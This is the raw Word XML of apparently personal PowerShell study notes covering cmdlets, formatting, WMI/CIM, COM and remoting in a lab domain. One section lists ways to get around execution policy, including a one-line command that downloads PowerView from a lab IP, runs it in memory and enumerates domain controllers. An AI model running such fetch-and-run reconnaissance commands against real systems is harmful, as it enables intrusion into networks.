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888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#Powershell basics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EA2B9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#Displays help information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A96E81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Get-Help *event*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A52A8F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Get-Help Get-EventLog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0028500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Get-Help Get-EventLog -Online</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259265D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9F8B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#Update help.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A8811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Update-Help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E2B8C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8976E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#Gets all commands that are installed on the computer, including cmdlets, aliases, functions, workflows, filters, scripts, and applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA4062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Get-Command -CommandType Cmdlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618C54B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ACED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#Lets you create a Windows PowerShell command in a command window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FCF5B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Show-Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136AC2B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C0B5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#Gets approved Windows PowerShell verbs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260CF3C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Get-Verb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F1294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CA8A8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#Gets the aliases in the current session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3113D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Get-Alias</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D20A4C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Get-Alias -Definition 'Get-Service'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E1E97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73F1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#To view the default module locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CD528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$env:psmodulepath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE36C0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3BC0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#Gets the modules that have been imported or that can be imported into the current session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04414BF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Get-Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580ADF2C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Get-Module -ListAvailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3420828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C9CA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#Gets the members, the properties and methods, of objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5652BF8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Get-Member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8AB0D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E887C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#Selecting properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B6E43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Get-EventLog -LogName Security | Select-Object -Property EventID,Message</w:t>
      </w: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35E3D1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B7CA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#Performs an operation against each item in a collection of input objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC98A3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Get-Process | ForEach-Object { $_.path }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C7B29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A93E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$computers = 'SRV1','SRV2','SRV3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA89C4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$computers[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687F6CEC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$computers = $computers | ForEach-Object {$_.ToLower()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B82933A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7196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#Selects objects from a collection based on their property values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3776255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Get-EventLog -LogName Security | Where-Object {$_.EventID -eq 4624}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A823DF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8EEBC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#Compares two sets of objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F888C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Compare-Object -ReferenceObject (Import-Clixml .\p.xml) -DifferenceObject (Get-Process) -Property name </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A4702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F1AA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#Sort objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5F339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Get-Process | Sort-Object -Property Vm -Descending</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324B126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0DDEA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#Batch cmdlets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002348F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Get-Service | Stop-Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B4051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338AB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#Declare variable type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795D440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Get-Help about_Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A08A20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[int]$number = Read-Host "Enter a number"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083DCC5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472C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#Input/Output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02451CD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Read-Host "Enter a number"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306FE29C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Write-Host "Colorful!" -Fore yellow -back magenta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F553C3C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Write-Host "Hello" | Where-Object {$_.length -gt 10}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F4B82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Write-Output "Hello" | Where-Object {$_.length -gt 10}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4A127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Write-Warning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB2B4E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Write-Verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D29D5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Write-Debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEAFEE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Write-Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1840C34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01D7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#Unrolling properties and methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7FBB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Get-Service | Select-Object -ExpandProperty Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19102A8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Get-Service | ForEach-Object {Write-Output $_.Name}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3CDD8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B655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#Script Block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3CEBD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$block = {Get-Process | Sort-Object -Property vm -Descending | Select-Object -First 10}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62307A62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&amp;$block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D3F54A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6031A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#New module manifest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2861F9F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New-ModuleManifest -Path PSHTools.psd1 -Author 'Mario Acosta' -CompanyName 'ACME' -Copyright '(c)2018 Mario Acosta' -Description 'Sample WMI Tools' -ModuleVersion 1.0 -PowerShellVersion 3.0 -RootModule .\PSHTools.psm1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BEC2B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40750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5FD6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#Powershell Extensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1168632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#PSSnapin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB0316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Gets the Windows PowerShell snap-ins on the computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E64D1C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Get-PSSnapin -Registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD1901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1D4C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#Modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C3A32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Get-Content Env:PSModulePath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371659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2E1AA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#Gets the modules that have been imported or that can be imported into the current session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A81D1C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Get-Module -ListAvailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7199C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3265D7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#Adds modules to the current session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DD3C3C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Import-Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5C89A2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1902C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BD6D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#Execution Policy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBEEF4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#Gets the execution policies for the current session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EEF8C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#Note:The execution policy is not a security system that restricts user actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACA866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Get-ExecutionPolicy -List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4692889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8ECFC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#Changes the user preference for the Windows PowerShell execution policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C738E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Set-ExecutionPolicy Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DFB85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Set-ExecutionPolicy Restricted -Scope CurrentUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AF85B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Set-ExecutionPolicy AllSigned -Scope CurrentUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A9D2D1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Set-ExecutionPolicy RemoteSigned -Scope CurrentUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F094FC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Set-ExecutionPolicy Unrestricted -Scope CurrentUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23465372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Set-ExecutionPolicy Bypass -Scope CurrentUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFC014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C9B17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#Bypass Powershell execution policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAB318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#Method 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B97BA2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Powershell.exe -executionpolicy Bypass -File .\PowerView.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CDF16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#Method 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B2672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echo Write-Host "Bypass" | Powershell -noprofile -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282B9371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#Method 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC414D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Get-Content .\PowerView.ps1 | powershell.exe -noprofile -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F605E3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#Method 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0A285C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Powershell.exe -Command "Write-Host 'Bypas!'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BB31DA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#Method 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F746FB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Invoke-Command -ScriptBlock {Write-Host 'Bypass'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EE41C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#Method 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F479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$write = "write-host 'bypass!!'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A37D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$bytes = [System.Text.Encoding]::Unicode.GetBytes($write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4CC74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Powershell.exe -EncodedCommand $encoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8529F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#Method 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA6927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Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://172.16.20.201/pw/Recon/PowerView.ps1');Get-NetDomainController -Domain contoso.lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274C99A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F294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0716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#Windows PowerShell provider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499C1F2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#Windows PowerShell providers let you access a variety of data stores as though they were file system drives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056378E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Get-PSProvider -PSProvider Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422F59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Get-Item 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C336A81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Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B89C4DC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Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -REcurse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F51F84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E72CA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#Sets the current working location to a specified location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7695AA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Set-Location REGISTRY::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69584BFC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7E95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#Creates temporary and persistent mapped network drives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6FDD4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New-PSDrive -name RegistryDrive -PSProvider Registry -Root Registry::HKEY_CLASSES_ROOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A883CC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cd RegistryDrive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678FF47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3054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#Gets information about the specified Windows PowerShell provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410D37A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Get-PSProvider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331DB001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5ED22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#Gets drives in the current session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3996F1D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Get-PSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC9942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6B44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#List cmdlets to use with PSDrive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217FD71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Get-Command -Noun *Item*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406BADDA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960E1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#Sets the current working location to a specified location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63068C0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Set-Location -Path C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D36BECA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2017C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#Creates a new item.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673FAB11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New-Item -ItemType Directory -Name Test2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10928DC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560CF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#Gets the properties of a specified item. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3D563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Get-ItemProperty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75219C6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9F12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#Gets the files and folders in a file system drive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52249DC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Get-ChildItem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C517B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B5ABC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4D24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#Powershell Formatting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06441B41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#Formating tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD65331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Get-Service | Format-Table -AutoSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2242830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Get-WmiObject Win32_OperatingSystem | Format-Table -Autosize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAA542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Get-Process | Format-Table -Property * -AutoSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6A37A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Get-Process | Format-Table -Property ID,Name,Responding -AutoSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE4D37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Get-Service | Sort-Object Status | Format-Table -GroupBy Status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9123A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Get-EventLog -LogName System -Newest 5 | Format-Table Source,Message -AutoSize -Wrap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A11393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E0A9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#Formating List.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879217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Get-ChildItem | Format-List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A06A20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Get-EventLog -LogName System -Newest 5 | Format-List -Property *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B83F7A1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BFE80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#Formating wide list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3631A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Get-ChildItem | Format-Wide -Column 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131AF7C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Get-EventLog -LogName Security -Newest 5 | Format-Wide -Property EventID -Column 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA17F8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A5B11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#Custom columns and list entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3187736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Get-Service | Format-Table @{name='ServiceName';expression={$_.Name}},Status,DisplayName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3464260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Get-Process | Format-Table -Property Name, @{name='VM(MB)';expression={$_.VM/1MB -as [int]}} -AutoSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0113463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Get-Process | Format-Table -Property Name, @{name='VM(MB)';expression={$_.VM/1MB -as [int]};formatstring='F2';align='right'} -AutoSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7A6362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437C8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#Out to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150DD2EA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Out-Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E611C7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Out-File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8F100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Out-Printer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51670DF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Out-GridView</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FE81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7A402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#Deletes output instead of sending it down the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EB98B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Get-Service | Out-Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4DD8C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831F2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#Sends output to the command line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4E8CC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Get-Service | Out-Host -Paging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7BB34A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A079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#Sends output to a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1022AA8A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Get-Service | Out-File services.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF532D2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Get-ChildItem | Out-File -FilePath a.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AB6F1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1A62A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#Sends output to an interactive table in a separate window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E066C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Get-ChildItem | Out-GridView</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D4ECF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38A6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#Convert to HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1632A1D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Get-Process | ConvertTo-Html | Out-File p.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F775C9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8027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47C5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#PowerShell Pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C538E12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#Export/Import to CSV.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7E084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Get-Process | Export-Csv p.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1161E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Import-Csv .\p.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E6361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B5A8E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#Export/Import to xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351EA27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Get-EventLog -LogName Security  -Newest 50 | Export-Clixml l.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734C115C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Import-Clixml .\l.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4842FDF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5DD3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3B9A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#CIM/WMI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07862A7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#Windows Management Instrumentation (WMI) is Microsoft’s implementation of Web-Based Enterprise Management (WBEM), the industry standard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4118C9B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#Classic WMI uses DCOM to communicate with networked devices to manage remote systems. Windows PowerShell 3.0 introduces a CIM provider model that uses WinRM to remove the dependency on DCOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE3B5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36EFEA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#The following three components of WMI interact with Windows PowerShell: Namespaces, Providers, and Classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189EBB2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#Namespaces are not physical locations, but are more like logical databases. All WMI namespaces are instances of the __Namespace system class. The default WMI namespace is Root/CIMV2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7E842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A0ED3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#To find WMI classes that are related to memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B8318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#Starting in Windows PowerShell 3.0, this cmdlet has been superseded by Get-CimInstance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2951529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Get-WmiObject -List *Video*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9AA4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65DCE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#Get processes on the local computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD765F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Get-WmiObject -Class Win32_Process | Select-Object ProcessName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346FF12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41E9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#Get WMI classes in the root or default namespace of the local computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78967F7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Get-WmiObject -Namespace "root/default" -List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A5C92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23E3C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#Get WMI namespaces in the current session, use a command with the following format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E5D24A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Get-WmiObject -Class __Namespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C10C91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BEC8C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#To get WMI namespaces in other namespaces, use the Namespace parameter to change the location of the search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567E877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Get-WmiObject -Class __Namespace -Namespace root/cimv2/applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F20649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06FD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#Get a named service on multiple computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79905E2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Get-WmiObject -Class Win32_Service | Select-Object PSComputerName,Name,state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3278FB7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Get-WmiObject -Query "select * from win32_service" | Select-Object PSComputerName,Name,state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6653393A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Get-WmiObject -Class Win32_Service -Filter "name='WinRM'" | Select-Object PSComputerName,Name,state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C746B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Get-WmiObject -Class Win32_Service -Filter "name='WinRM'" -ComputerName CLI-1,CLI-2,CLI-4 | Select-Object PSComputerName,Name,state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F1338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363D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$bios = Get-WmiObject -Class Win32_Bios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2B059A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$bios.Manufacturer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0382C981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9045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#The Invoke-WmiMethod cmdlet calls the methods of Windows Management Instrumentation (WMI) objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA8A3C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#New Common Information Model (CIM) cmdlets, introduced in Windows PowerShell 3.0, perform the same tasks as the WMI cmdlets. The CIM cmdlets comply with WS-Management (WSMan) standards and with the CIM standard, which enables the </w:t>
      </w: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cmdlets to use the same techniques to manage Windows computers and those running other operating systems. Instead of using Invoke-WmiMethod , consider using Invoke-CimMethod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA09E4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#CIM/WMI Invoking methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E5DE0A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Get-WmiObject win32_networkadapterconfiguration -filter "description like '%real%'" | Invoke-WmiMethod -name EnableDHCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55841F6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Get-WmiObject -Class Win32_Service -Filter "name='BITS'" | ForEach-Object -Process {$_.change($null,$null,$null,$null,$null,$null,$null,"P@ssw0rd")}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B51F8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Get-WmiObject -Class Win32_Service -Filter "name='BITS'" | % {$_.change($null,$null,$null,$null,$null,$null,$null,"P@ssw0rd")}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6787AD4C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Get-CimInstance -ClassName win32_networkadapterconfiguration -filter "description like '%real%'" | Invoke-CimMethod -MethodName EnableDHCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B10375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7F2A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#Start an instance of an application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F95AA2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Get-WmiObject -Class win32_process -List | Select-Object -ExpandProperty Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAE0CDC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(Get-WmiObject -Class win32_process -List).GetMethodParameters('create')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F303A9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Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843ED6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72D4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#The Remove-WmiObject cmdlet deletes an instance of an existing Windows Management Instrumentation (WMI)class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25910B1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Invoke-WmiMethod -Path win32_process -Name create -ArgumentList "powershell.exe -c Get-Service -noexit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862FBF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Get-WmiObject -Class win32_process -Filter "Name='Powershell.exe'" -ComputerName CLI-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186A430A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Get-WmiObject -Class win32_process -Filter "Name='Powershell.exe'" -ComputerName CLI-1 | Remove-WmiObject </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9A86E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58B6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Invoke-WmiMethod -Path win32_process -Name create -ArgumentList "notepad.exe" -ComputerName CLI-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F31DF8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(Get-WmiObject -Class win32_process -Filter "Name='Notepad.exe'" -ComputerName CLI-1).terminate()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675A556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C26C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803D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#COM Objects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4477683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#Exploring </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E66A3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Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\CLSID -include PROGID -recurse | Foreach {$_.GetValue("")}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29857E1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434ED1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#Creating and using COM object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E33513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$wscript = New-Object -ComObject WScript.Shell.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF61A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$wscript.CurrentDirectory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0613261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$wscript.Popup("Hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA1D3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$wscript.Exec("notepad.exe")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442FE2C2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AF82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EDB8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#PowerShell Remoting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C29223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#Based on WSMAN Protocol and uses WinRM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71124CBA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#Use a protocol call Web Services Of Management (WS-MAN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661676FA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#WS-MAN operates over HTTP or HTTPS (Default needs port 5985/HTTP and 5986/HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DF34F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#WS-MAN is implemented in form of a background WinRM services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF503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B4B361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#Enable remoting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B527DE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Enable-PSRemoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B610A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AA379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#They communicate over remote procedure calls RPCs (legacy cmdlets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A23F3B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Get-WmiObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5049E5C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Get-WmiObject -Namespace root\cimv2 -list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E02274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Get-WmiObject -Namespace root\cimv2 -class win32_desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9393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Get-WmiObject Win32_Bios -ComputerName CLI-1,CLI-2,DC-1 | Format-Table @{label='ComputerName';expression={$_.__Server}},@{label='BiosSerial';expression={$_.SerialNumber}},@{label='OSBuild';expression={gwmi -class win32_operatingsystem -computer $_.__SERVER | Select-Object -expand BuildNumber}} -autosize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E04C0D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Invoke-WmiMethod </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57667ABA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F192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#They communicate over WS-MAN (Implemented by the Windows Remote Management or WinRM service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F3952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Get-CimInstance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ADB94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Invoke-CimMethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAAD1C2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Get-CimInstance -ClassName Win32_logicalDisk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3DD2F2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D2751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#To verify that remoting is configured correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE2D1C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#Note:To create remote sessions and run remote commands, by default, the current user must be a member of the Administrators group on the remote computer or provide the credentials of an administrator. Otherwise, the command fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9620F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New-PSSession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397ACE7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F69F2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#Several cmdlets have a ComputerName parameter that lets you get objects from remote computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA0440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#These cmdlets do not use WS-Management-based Windows PowerShell remoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5E959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Get-Command | where { $_.Parameters.Keys -contains "ComputerName" -and $_.Parameters.Keys -NotContains "Session"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D7BA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C84B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#PSSSession.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099B2C6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Enter-PSSession -ComputerName CLI-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21043F4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Exit-PSSession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFCF71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9FF4D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#Closes one or more Windows PowerShell sessions (PSSessions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34809A8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Remove-PSSession -Id 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B4C5E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19ADE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#Runs commands on local and remote computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02312F1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Invoke-Command -ComputerName CLI-1,CLI-3 -command {Get-EventLog Security -newest 10 | Where-Object -filter {$_.EventID -eq 1212}} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E94E3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Invoke-Command -ComputerName DC-1 -ScriptBlock {Get-Host} -Credential DOMAIN\Administrador</w:t>
      </w:r>
    </w:p>
